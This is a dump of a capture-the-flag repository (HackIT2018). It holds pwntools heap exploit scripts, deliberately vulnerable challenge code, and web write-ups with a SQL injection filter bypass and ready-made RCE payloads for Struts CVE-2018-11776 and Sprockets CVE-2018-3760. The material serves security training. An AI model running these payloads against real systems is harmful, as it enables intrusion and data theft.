87 | payload = "Y"*87 88 | edit_title(3,payload) 89 | 90 | show(3) 91 | #p.interactive() 92 | p.recvuntil("YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY\n") 93 | #print p.recv(6) 94 | #p.interactive() 95 | bss = p.recv(6) 96 | bss = bss.ljust(8,"\x00") 97 | #bss = "\x88" + bss 98 | bss = u64(bss) - 0x202010 99 | log.success("Text: " + hex(bss)) 100 | raw_input() 101 | 102 | payload = "Y"*88 103 | payload += p64(0xffffffffff600000) 104 | payload += p64(0x2000) 105 | payload += p64(bss + 0x0000000000201f78) # puts@GOT 106 | edit_title(3,payload) 107 | raw_input() 108 | # Leak libc. 109 | show(4) 110 | p.recvuntil("Statement: ") 111 | libc = p.recv(6) 112 | libc += "\x00"*2 113 | libc = u64(libc) - 0x68f90 - 0x176c0 114 | log.success("Libc: " + hex(libc)) 115 | 116 | payload = "Y"*88 117 | payload += p64(0xffffffffff600000) 118 | payload += p64(0x2000) 119 | payload += p64(bss + 0x0000000000202060) # bank. 120 | edit_title(3,payload) 121 | 122 | # Leak heap. 123 | show(4) 124 | p.recvuntil("Statement: ") 125 | heap = p.recv(6) 126 | heap += "\x00"*2 127 | heap = u64(heap) - 0x10 128 | log.success("Heap: " + hex(heap)) 129 | 130 | malloc_hook = bss + 0x20203d 131 | #magic = libc + 0x3f35a 132 | magic = libc + 0xd694f 133 | #magic = libc + 0x3f306 134 | 135 | payload = "Y"*88 136 | payload += p64(0xffffffffff600000) 137 | payload += p64(0x2000) 138 | payload += p64(libc+0x3986f5) 139 | edit_title(3,payload) 140 | 141 | lol = "GGWP" 142 | create(lol,90,"HH") # 6 143 | shutdown(6) 144 | 145 | payload = "Y"*88 146 | payload += p64(0xffffffffff600000) 147 | payload += p64(0x2000) 148 | payload += p64(libc+0x3986f5) 149 | payload += "Z"*16 150 | payload += p64(0x41) 151 | payload += p64(0x00) 152 | payload += "Z"*48 153 | payload += p64(0x31) 154 | payload += p64(0x00) 155 | payload += "Z"*32 156 | payload += p64(0x71) 157 | payload += p64(libc+0x3986f5) 158 | edit_title(3,payload) 159 | 160 | #raw_input() 161 | create("GGWP",90,"LL") 162 | fake_construct = 
p64(0xffffffffff600000) 163 | fake_construct += p64(0x2000) 164 | fake_construct += p64(0xffffffffff600000) 165 | 166 | create("GGWP",90,fake_construct) 167 | raw_input("CHECK") 168 | 169 | shutdown(6) 170 | payload = "Y"*88 171 | payload += p64(0xffffffffff600000) 172 | payload += p64(0x2000) 173 | payload += p64(malloc_hook) 174 | payload += "Z"*16 175 | payload += p64(0x41) 176 | payload += p64(0x00) 177 | payload += "Z"*48 178 | payload += p64(0x31) 179 | payload += p64(0x00) 180 | payload += "Z"*32 181 | payload += p64(0x71) 182 | payload += p64(malloc_hook) 183 | edit_title(3,payload) 184 | 185 | create("GGWP",90,"LL") 186 | 187 | #p.interactive() 188 | 189 | finale = "/bin/sh\x00" 190 | finale += "X"*11 191 | finale += p64(libc + 0x398705) # far from __free_hook 192 | finale += p64(0x00)*6 193 | finale += p64(0x00)[0:6] 194 | raw_input("AS") 195 | create("GGWP",90,finale) 196 | raw_input() 197 | 198 | new = "\x00"*(0x1088-0x1d) 199 | new += p64(libc + 0x3f480)[0:6] 200 | #new = p64(0x00)*12 201 | #new += p64(libc + 0x398c1e) 202 | cr7(0,new) 203 | 204 | raw_input() 205 | #shutdown(8) 206 | 207 | p.interactive() 208 | -------------------------------------------------------------------------------- /pwn/HashMan/README.md: -------------------------------------------------------------------------------- 1 | Race condition + object confusion to trigger dangling ptr / UAF. 
2 | -------------------------------------------------------------------------------- /pwn/HashMan/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | 4 | #p = remote("185.168.131.14",1337) 5 | p = process("./final_new") 6 | #raw_input() 7 | 8 | def menu(): 9 | p.recvuntil(">>") 10 | 11 | def create_sha(key,length,plain,desc): 12 | menu() 13 | p.sendline("1") 14 | p.recvuntil("it:") 15 | p.sendline(str(key)) 16 | p.recvuntil("plaintext:") 17 | p.sendline(str(length)) 18 | p.recvuntil("plaintext:") 19 | p.sendline(plain) 20 | p.recvuntil("feedback:") 21 | p.sendline(desc) 22 | 23 | def print_key(idx,key): 24 | menu() 25 | p.sendline("9") 26 | p.recvuntil("?") 27 | p.sendline(str(idx)) 28 | p.recvuntil("key:") 29 | p.sendline(str(key)) 30 | 31 | def edit_key(idx,key,new_d,new_feed): 32 | menu() 33 | p.sendline("8") 34 | p.recvuntil("?") 35 | p.sendline(str(idx)) 36 | p.recvuntil("key:") 37 | p.sendline(str(key)) 38 | p.recvuntil("data:") 39 | p.sendline(new_d) 40 | p.recvuntil("feedback:") 41 | p.sendline(new_feed) 42 | 43 | def free_key(idx,key): 44 | menu() 45 | p.sendline("7") 46 | p.recvuntil("?") 47 | p.sendline(str(idx)) 48 | p.recvuntil("key:") 49 | p.sendline(str(key)) 50 | 51 | def race_free_key(idx,key): 52 | menu() 53 | p.sendline("7") 54 | p.recvuntil("?") 55 | p.sendline(str(idx)) 56 | p.recvuntil("key:") 57 | 58 | def race_edit_key(idx,key,new_d,new_feed): 59 | menu() 60 | p.sendline("8") 61 | p.recvuntil("?") 62 | p.sendline(str(idx)) 63 | p.recvuntil("key:") 64 | 65 | def race_print_key(idx): 66 | menu() 67 | p.sendline("9") 68 | p.recvuntil("?") 69 | p.sendline(str(idx)) 70 | p.recvuntil("key:") 71 | 72 | def reset(): 73 | menu() 74 | p.sendline("10") 75 | 76 | 77 | create_sha(222,20,"AAAA","BBBB") 78 | create_sha(223,20,"AAAA","BBBB") 79 | sleep(6) 80 | create_sha(222,20,"AAAA","BBBB") 81 | race_print_key(2) 82 | 83 | p.recvuntil("prevented a collision") 84 | 
p.sendline("0") 85 | p.recvuntil("Feedback: ") 86 | p.recv(8) 87 | heap = u64(p.recv(8)) - 0x260 88 | log.success("Heap: " + hex(heap)) 89 | 90 | reset() 91 | words = "D"*8 92 | words += p64(heap+0x2b0) 93 | words += p64(0x0) 94 | fake = p64(0xb1) 95 | create_sha(260,40,"CCCC",fake) 96 | sleep(6) 97 | create_sha(260,40,"CCCC",words) 98 | race_free_key(3,260) 99 | p.recvuntil("prevented a collision") 100 | p.sendline("0") 101 | 102 | print_key(2,260) 103 | p.recvuntil("Feedback: ") 104 | p.recv(8) 105 | libc = u64(p.recv(8)) - 0x3c4b78 106 | log.success("Libc: " + hex(libc)) 107 | 108 | fake = p64(0xbf) 109 | fake += p64(libc + 0x3c4b78) 110 | fake += p64(libc + 0x3c4b78) 111 | edit_key(2,260,"VV",fake) 112 | 113 | p.interactive() 114 | -------------------------------------------------------------------------------- /pwn/HashMan/hash_man: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/pwn/HashMan/hash_man -------------------------------------------------------------------------------- /pwn/KAMIKAZE/README.md: -------------------------------------------------------------------------------- 1 | 1. Uninitialised variable exists in linked list, but not exploitable since program uses calloc. 2 | 3 | 2. Use xoring to change last nibble of calloc to 0xf. 4 | 5 | 3. Now , calloc will not perform the zero-ing operation, and result in creating the bug "uninitialized FD ptr of linked list". 6 | 7 | 4. Calloc trick I learnt from Stringer (RCTF, an XCTF league event). 
8 | -------------------------------------------------------------------------------- /pwn/KAMIKAZE/kamikaze: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/pwn/KAMIKAZE/kamikaze -------------------------------------------------------------------------------- /pwn/KAMIKAZE/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | 4 | #p = remote("185.168.131.14",6200) 5 | p = process("./kamikaze") 6 | raw_input() 7 | 8 | def menu(): 9 | p.recvuntil(">>") 10 | 11 | def add_s(wei,stan_s,stan,comm): 12 | menu() 13 | p.sendline("1") 14 | p.recvuntil("song:") 15 | p.sendline(str(wei)) 16 | p.recvuntil("stanza:") 17 | p.sendline(str(stan_s)) 18 | p.recvuntil("stanza:") 19 | p.sendline(stan) 20 | p.recvuntil("too:") 21 | p.sendline(comm) 22 | 23 | def kamikaze(wei,seed): 24 | menu() 25 | p.sendline("3") 26 | p.recvuntil("weight:") 27 | p.sendline(str(wei)) 28 | p.recvuntil("seed:") 29 | p.sendline(str(seed)) 30 | 31 | def remove(wei): 32 | menu() 33 | p.sendline("4") 34 | p.recvuntil("weight:") 35 | p.sendline(str(wei)) 36 | 37 | def play(idx): 38 | menu() 39 | p.sendline("5") 40 | p.recvuntil("index:") 41 | p.sendline(str(idx)) 42 | 43 | buf = "B"*16 44 | add_s(20,30,"AAAA",buf) # head. 45 | 46 | add_s(21,30,"AAAA",buf) 47 | remove(21) 48 | 49 | add_s(21,80,"AAAA",buf) 50 | add_s(22,80,"AAAA",buf) 51 | add_s(23,30,"AAAA",buf) 52 | 53 | # overflow from 21 into 22. 
54 | remove(22) 55 | kamikaze(21,14) 56 | 57 | add_s(22,80,"AAAA",buf) 58 | #p.interactive() 59 | remove(23) 60 | 61 | play(3) 62 | p.recvuntil("Weight: ") 63 | leak = p.recvline().strip("\n") 64 | heap = int(leak,16) - 0x1b0 65 | log.success("Heap: " + hex(heap)) 66 | 67 | #raw_input() 68 | #add_s(24,80,"AAAA",buf) 69 | remove(heap+0x1b0) 70 | 71 | remove(20) 72 | 73 | buf1 = "A"*8 74 | buf1 += p64(0xe1) 75 | 76 | add_s(20,30,buf1,buf) 77 | 78 | buf2 = p64(0x80) 79 | buf2 += p64(heap+0x50) 80 | buf2 += p64(heap+0x1f0) 81 | 82 | fake = p64(0x90) 83 | fake += p64(heap+0x50) 84 | fake += p64(0x0) 85 | 86 | add_s(0,80,fake,buf) 87 | add_s(21,30,buf2,buf) 88 | 89 | remove(0x80) 90 | 91 | play(1) 92 | p.recvuntil("Stanza: ") 93 | libc = p.recv(6) + "\x00"*2 94 | libc = u64(libc) - 0x3c4b78 95 | log.success("Libc: " + hex(libc)) 96 | 97 | p.interactive() 98 | -------------------------------------------------------------------------------- /web/BabyPeeHPee/README.md: -------------------------------------------------------------------------------- 1 | This challenge is a PHP Challenge with source code access and an extension, that implemented a custom auth function 2 | The extension wasn't stripped so we could easily disasemble and figure out what's happening in IDA : 3 | 4 | Auth function : 5 | ```C 6 | Php::Parameters *__fastcall auth(Php::Parameters *a1, __int64 a2) 7 | { 8 | __int64 v2; // rax@1 9 | const char *v3; // rax@1 10 | Php::Parameters *result; // rax@1 11 | __int64 v5; // rbx@1 12 | char dest; // [sp+10h] [bp-60h]@1 13 | char v7[8]; // [sp+30h] [bp-40h]@1 14 | __int64 v8; // [sp+58h] [bp-18h]@1 15 | 16 | v8 = *MK_FP(__FS__, 40LL); 17 | strcpy(v7, "21232f297a57a5a743894a0e4a801fc3"); 18 | LODWORD(v2) = std::vector>::operator[](a2, 1LL); 19 | LODWORD(v3) = Php::Value::operator char const*(v2); 20 | strcpy(&dest, v3); 21 | Php::Value::Value(a1, v7, -1); 22 | result = a1; 23 | v5 = *MK_FP(__FS__, 40LL) ^ v8; 24 | return result; 25 | } 26 | ``` 27 | 28 | The 
strcpy call copies the second argument into the dest buffer with no size check, so this is a clear stack buffer overflow 29 | The function returns the contents of the v7 array, which is initialized by default to "21232f297a57a5a743894a0e4a801fc3" 30 | The distance between v7 and dest is ($bp-0x40) - ($bp-0x60) = 0x20, so if we write more than 0x20 (32) chars into the dest buffer we overflow into the v7 buffer, thus controlling what the function returns. 31 | Now let's move to the PHP bug, which is a trivial PHP type juggling issue: the two md5() results are compared with the loose `==` operator, so two different hex digests of the form 0e followed only by digits are both read as the number zero and compare equal (a strict comparison with `===` or hash_equals() would not treat them as equal). Since we control the $digest value, we can make it a magic hash value and exploit the type juggling vulnerability at the [line](https://github.com/DefConUA/HackIT2018/blob/master/web/PeeHPee/index.php#L17): 32 | 33 | Using : http://host/?u=240610708&p=AAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBQNKCDZO 34 | -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.id0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/BabyPeeHPee/auth.id0 -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.id1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/BabyPeeHPee/auth.id1 -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.id2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/BabyPeeHPee/auth.id2 -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.nam: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/BabyPeeHPee/auth.nam -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/BabyPeeHPee/auth.so -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.til: -------------------------------------------------------------------------------- 1 | IDATILLocal type definitionsgnuunx64 -------------------------------------------------------------------------------- /web/BabyPeeHPee/flag.php: -------------------------------------------------------------------------------- 1 | Baby:
You may need this and/or this
"; 10 | 11 | if (isset($_GET['source'])){ 12 | show_source(__FILE__); 13 | } 14 | 15 | $digest = @auth($username,$password); 16 | 17 | if (md5($username) == md5($digest) and $digest !== $username){ 18 | 19 | echo "you are a good boy here is your flag : $flag"; 20 | 21 | } 22 | 23 | else { 24 | echo "you are not a good boy so no flag for you :("; 25 | } 26 | 27 | -------------------------------------------------------------------------------- /web/PeeHPee2/README.md: -------------------------------------------------------------------------------- 1 | This challenge is another PHP application, where you can fetch a URL and see the response. 2 | It's an obvious SSRF Challenge with a blacklist filter: 3 | ```php 4 | $url = $_POST['url']; 5 | $parsed = parse_url($url); 6 | $scheme = $parsed['scheme']; 7 | if($scheme !== 'http'){ 8 | die('Hacking attempt'); 9 | } 10 | $blacklist = ["127","local","::","http://0/"]; 11 | foreach ($blacklist as $value) { 12 | if (stripos($url,$value) !== false) 13 | die('Hacking attempt'); 14 | } 15 | if (substr_count($parsed['host'], '.') > 0){ 16 | die('hacking attempt'); 17 | } 18 | ``` 19 | So it seems it's not possible to use a scheme other than http; there is also a filter on the localhost address and IPv6 notation, and a check on the number of dots in the host, 20 | so a domain-based bypass does not seem possible. One possible way to bypass this filter is to use decimal notation, http://2130706433/ (the filter looks only at the text of the URL, not at the address it resolves to) 21 | The next step is to scan the internal network for other services; the only other service is running on port 8080, which shows the Tomcat default page.
22 | The hint suggested that I was using Struts version 2.3.14, you can then find out that this [version](https://www.securityfocus.com/bid/105125) was vulnerable to CVE-2018-11776 23 | I was using this exact container : https://github.com/bhdresh/CVE-2018-11776 24 | The only difference is that your payload will be through ssrf so you might have to encode your payloads 25 | After getting rce, the goal was to read the file /flag , the full payload(in browser) looks like : http://2130706433:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/flag%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action 26 | -------------------------------------------------------------------------------- /web/PeeHPee2/index.php: -------------------------------------------------------------------------------- 1 | 0){ 17 | die('hacking attempt'); 18 | } 19 | 20 | $ch = curl_init(); 21 | curl_setopt($ch, CURLOPT_URL, $url); 22 | curl_setopt($ch, CURLOPT_HEADER, true); 23 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); 24 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 25 | $result = curl_exec($ch); 26 | } 27 | ?> 28 | 29 | 30 | 31 | 32 | Pee H Pee 33 | 34 | 35 | 36 |
64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /web/Republic_of_Gayming/README.md: -------------------------------------------------------------------------------- 1 | This challenge was provided with source code access, written in nodejs. 2 | The bug is related to prototype pollution in the [line](https://github.com/DefConUA/HackIT2018/blob/master/web/Republic_of_Gayming/app.js#L64) 3 | The general idea behind prototype pollution is that you have an expression like : 4 | obj[a][b] = value 5 | 6 | And the user can control a, b and value 7 | if the user sets "a" to "\__proto__" and "b" to any property, they can inject that property, with the value "value", into every existing object that inherits from that prototype; validating that both keys are expected values (here, integers 0-2) before the assignment prevents this 8 | for more details check [this](https://github.com/HoLyVieR/prototype-pollution-nsec18) 9 | 10 | The script I used is pretty simple: pollute the array prototype with the attribute admintoken and an arbitrary value, then query /admin with the md5 of that value. 11 | Note: At some points a lot of teams were changing the __proto__ at the same time, so it became like a trivial race condition, but it can be won easily 12 | ```python 13 | import requests 14 | 15 | 16 | r = requests.post('http://185.168.131.1:3000/api',json={'row':'__proto__','col':'admintoken','data':'qqq'}) 17 | r = requests.get('http://185.168.131.1:3000/admin?querytoken=' + md5sumhex('qqq')) 18 | print r.text 19 | 20 | ``` 21 | -------------------------------------------------------------------------------- /web/Republic_of_Gayming/app.js: -------------------------------------------------------------------------------- 1 | const express = require('express') 2 | var hbs = require('hbs'); 3 | var bodyParser = require('body-parser'); 4 | const md5 = require('md5'); 5 | var morganBody = require('morgan-body'); 6 | const app = express(); 7 | var user = []; //empty for now 8 | 9 | var matrix = []; 10 | for (var i = 0; i < 3; i++){ 11 | matrix[i] = [null , null, null]; 12 | } 13 | 14 | function draw(mat) { 15
| var count = 0; 16 | for (var i = 0; i < 3; i++){ 17 | for (var j = 0; j < 3; j++){ 18 | if (matrix[i][j] !== null){ 19 | count += 1; 20 | } 21 | } 22 | } 23 | return count === 9; 24 | } 25 | 26 | app.use('/static', express.static('static')); 27 | app.use(bodyParser.json()); 28 | app.set('view engine', 'html'); 29 | morganBody(app); 30 | app.engine('html', require('hbs').__express); 31 | 32 | app.get('/', (req, res) => { 33 | 34 | for (var i = 0; i < 3; i++){ 35 | matrix[i] = [null , null, null]; 36 | 37 | } 38 | res.render('index'); 39 | }) 40 | 41 | 42 | app.get('/admin', (req, res) => { 43 | /*this is under development I guess ??*/ 44 | 45 | if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){ 46 | res.send('Hey admin your flag is flag{prototype_pollution_is_very_dangerous}'); 47 | } 48 | else { 49 | res.status(403).send('Forbidden'); 50 | } 51 | } 52 | ) 53 | 54 | 55 | app.post('/api', (req, res) => { 56 | var client = req.body; 57 | var winner = null; 58 | 59 | if (client.row > 3 || client.col > 3){ 60 | client.row %= 3; 61 | client.col %= 3; 62 | } 63 | 64 | matrix[client.row][client.col] = client.data; 65 | console.log(matrix); 66 | for(var i = 0; i < 3; i++){ 67 | if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){ 68 | if (matrix[i][0] === 'X') { 69 | winner = 1; 70 | } 71 | else if(matrix[i][0] === 'O') { 72 | winner = 2; 73 | } 74 | } 75 | if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){ 76 | if (matrix[0][i] === 'X') { 77 | winner = 1; 78 | } 79 | else if(matrix[0][i] === 'O') { 80 | winner = 2; 81 | } 82 | } 83 | } 84 | 85 | if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){ 86 | winner = 1; 87 | } 88 | if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){ 89 | winner = 2; 90 | } 91 | 92 | if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){ 93 | winner = 
1; 94 | } 95 | if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){ 96 | winner = 2; 97 | } 98 | 99 | if (draw(matrix) && winner === null){ 100 | res.send(JSON.stringify({winner: 0})) 101 | } 102 | else if (winner !== null) { 103 | res.send(JSON.stringify({winner: winner})) 104 | } 105 | else { 106 | res.send(JSON.stringify({winner: -1})) 107 | } 108 | 109 | }) 110 | app.listen(3000, () => { 111 | console.log('app listening on port 3000!') 112 | }) 113 | 114 | -------------------------------------------------------------------------------- /web/Republic_of_Gayming/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | NODE_ENV=production node app.js 1>log.txt & 4 | -------------------------------------------------------------------------------- /web/RuAdmin/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files for more about ignoring files. 2 | # 3 | # If you find yourself ignoring temporary files generated by your text editor 4 | # or operating system, you probably want to add a global ignore instead: 5 | # git config --global core.excludesfile '~/.gitignore_global' 6 | 7 | # Ignore bundler config. 8 | /.bundle 9 | 10 | # Ignore all logfiles and tempfiles. 11 | /log/* 12 | /tmp/* 13 | !/log/.keep 14 | !/tmp/.keep 15 | 16 | # Ignore Byebug command history file. 
17 | .byebug_history 18 | -------------------------------------------------------------------------------- /web/RuAdmin/Gemfile: -------------------------------------------------------------------------------- 1 | source 'https://rubygems.org' 2 | 3 | git_source(:github) do |repo_name| 4 | repo_name = "#{repo_name}/#{repo_name}" unless repo_name.include?("/") 5 | "https://github.com/#{repo_name}.git" 6 | end 7 | gem 'execjs' 8 | gem 'therubyracer', :platforms => :ruby 9 | gem 'carrierwave' 10 | gem 'bootstrap-sass' 11 | gem 'sprockets','3.7.0' 12 | # Bundle edge Rails instead: gem 'rails', github: 'rails/rails' 13 | gem 'rails', '~> 5.0.7' 14 | # Use mysql as the database for Active Record 15 | gem 'mysql2', '>= 0.3.18', '< 0.6.0' 16 | # Use Puma as the app server 17 | gem 'puma', '~> 3.0' 18 | # Use SCSS for stylesheets 19 | gem 'sass-rails', '~> 5.0' 20 | # Use Uglifier as compressor for JavaScript assets 21 | gem 'uglifier', '>= 1.3.0' 22 | # Use CoffeeScript for .coffee assets and views 23 | gem 'coffee-rails', '~> 4.2' 24 | # See https://github.com/rails/execjs#readme for more supported runtimes 25 | # gem 'therubyracer', platforms: :ruby 26 | 27 | # Use jquery as the JavaScript library 28 | gem 'jquery-rails' 29 | # Turbolinks makes navigating your web application faster. Read more: https://github.com/turbolinks/turbolinks 30 | gem 'turbolinks', '~> 5' 31 | # Build JSON APIs with ease. 
Read more: https://github.com/rails/jbuilder 32 | gem 'jbuilder', '~> 2.5' 33 | # Use Redis adapter to run Action Cable in production 34 | # gem 'redis', '~> 3.0' 35 | # Use ActiveModel has_secure_password 36 | # gem 'bcrypt', '~> 3.1.7' 37 | 38 | # Use Capistrano for deployment 39 | # gem 'capistrano-rails', group: :development 40 | 41 | group :development, :test do 42 | # Call 'byebug' anywhere in the code to stop execution and get a debugger console 43 | gem 'byebug', platform: :mri 44 | end 45 | 46 | group :development do 47 | # Access an IRB console on exception pages or by using <%= console %> anywhere in the code. 48 | gem 'web-console', '>= 3.3.0' 49 | gem 'listen', '~> 3.0.5' 50 | # Spring speeds up development by keeping your application running in the background. Read more: https://github.com/rails/spring 51 | gem 'spring' 52 | gem 'spring-watcher-listen', '~> 2.0.0' 53 | end 54 | 55 | # Windows does not include zoneinfo files, so bundle the tzinfo-data gem 56 | gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw, :jruby] 57 | -------------------------------------------------------------------------------- /web/RuAdmin/README.md: -------------------------------------------------------------------------------- 1 | This challenge was a ruby on rails application. 2 | The index route redirects to a login page, which is vulnerable to SQL injection 3 | After people bypass auth with simple payloads like `' or 1=1 #` you will know that the goal is to retrieve the admin password using SQLi and log in to /admin. 4 | The filter was : 5 | ```RUBY 6 | hack = /union|benchmark|strcmp|locate|STRCMP|position|file|concat|sleep|md5|mid|sub|count|and|left|load|space|instr|pad|conv|right|ascii|cast|reverse|locate|glob|having|like|match|char|regexp|limit|order|group|hex|information/i 7 | ``` 8 | So there are no substr functions, no unions, etc. A keyword blacklist in front of a query built by string interpolation only narrows the syntax available; binding the parameters, as the admin action's find_by call does, is what removes the injection.
9 | A possible solution (there are others) is to use the insert function; basically you can do : 10 | SELECT ('a')=(insert((SELECT password from users where isadmin=1), 2, 255, '')); 11 | And do blind injection to retrieve the password; more details about this technique are [here](https://gist.github.com/stypr/43fce10db9fa44b5f072442245d9e82e) 12 | After finding the admin password and logging in to /admin, we will be redirected to /upload where you can upload any file you want; the only thing that is returned is the PATH of that file. 13 | The Gemfile shows the version of Sprockets that was used, which was vulnerable to CVE-2018-3760 14 | Basically you need to upload an erb file containing your payload and abuse the CVE to get RCE : 15 | The payload for rce looks like : http://185.168.131.128:8080/assets/file:%2f%2f/home/web03/app/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252E%252E/%252E%252E/home/web03/app/uploads/resumes/someHash/file.erb%3Ftype=text/plain 16 | For more details about the CVE, check Orange Tsai's talk at BHUSA 2018. 17 | Note: The application was in production mode but the assets.compile flag was on. That setting is what leaves the Sprockets server answering /assets requests at runtime, so upgrading Sprockets to a patched release or serving only precompiled assets with assets.compile off closes this path. 18 | -------------------------------------------------------------------------------- /web/RuAdmin/Rakefile: -------------------------------------------------------------------------------- 1 | # Add your own tasks in files placed in lib/tasks ending in .rake, 2 | # for example lib/tasks/capistrano.rake, and they will automatically be available to Rake.
3 | 4 | require_relative 'config/application' 5 | 6 | Rails.application.load_tasks 7 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/config/manifest.js: -------------------------------------------------------------------------------- 1 | //= link_tree ../images 2 | //= link_directory ../javascripts .js 3 | //= link_directory ../stylesheets .css 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/images/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/app/assets/images/.keep -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/application.js: -------------------------------------------------------------------------------- 1 | // This is a manifest file that'll be compiled into application.js, which will include all the files 2 | // listed below. 3 | // 4 | // Any JavaScript/Coffee file within this directory, lib/assets/javascripts, vendor/assets/javascripts, 5 | // or any plugin's vendor/assets/javascripts directory can be referenced here using a relative path. 6 | // 7 | // It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the 8 | // compiled file. JavaScript code in this file should be added after the last require_* statement. 9 | // 10 | // Read Sprockets README (https://github.com/rails/sprockets#sprockets-directives) for details 11 | // about supported directives. 12 | // 13 | //= require jquery 14 | //= require jquery_ujs 15 | //= require turbolinks 16 | //= require_tree . 
17 | function validateFiles(inputFile) { 18 | var maxExceededMessage = "This file exceeds the maximum allowed file size (5 MB)"; 19 | var extErrorMessage = "Only image file with extension: .jpg, .jpeg, .gif or .png is allowed"; 20 | var allowedExtension = ["jpg", "jpeg", "gif", "png"]; 21 | 22 | var extName; 23 | var maxFileSize = $(inputFile).data('max-file-size'); 24 | var sizeExceeded = false; 25 | var extError = false; 26 | 27 | $.each(inputFile.files, function() { 28 | if (this.size && maxFileSize && this.size > parseInt(maxFileSize)) {sizeExceeded=true;}; 29 | extName = this.name.split('.').pop(); 30 | if ($.inArray(extName, allowedExtension) == -1) {extError=true;}; 31 | }); 32 | if (sizeExceeded) { 33 | window.alert(maxExceededMessage); 34 | $(inputFile).val(''); 35 | }; 36 | } 37 | 38 | 39 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/cable.js: -------------------------------------------------------------------------------- 1 | // Action Cable provides the framework to deal with WebSockets in Rails. 2 | // You can generate new channels where WebSocket features live using the rails generate channel command. 
3 | // 4 | //= require action_cable 5 | //= require_self 6 | //= require_tree ./channels 7 | 8 | (function() { 9 | this.App || (this.App = {}); 10 | 11 | App.cable = ActionCable.createConsumer(); 12 | 13 | }).call(this); 14 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/channels/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/app/assets/javascripts/channels/.keep -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/resumes.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/sessions.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/users.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 
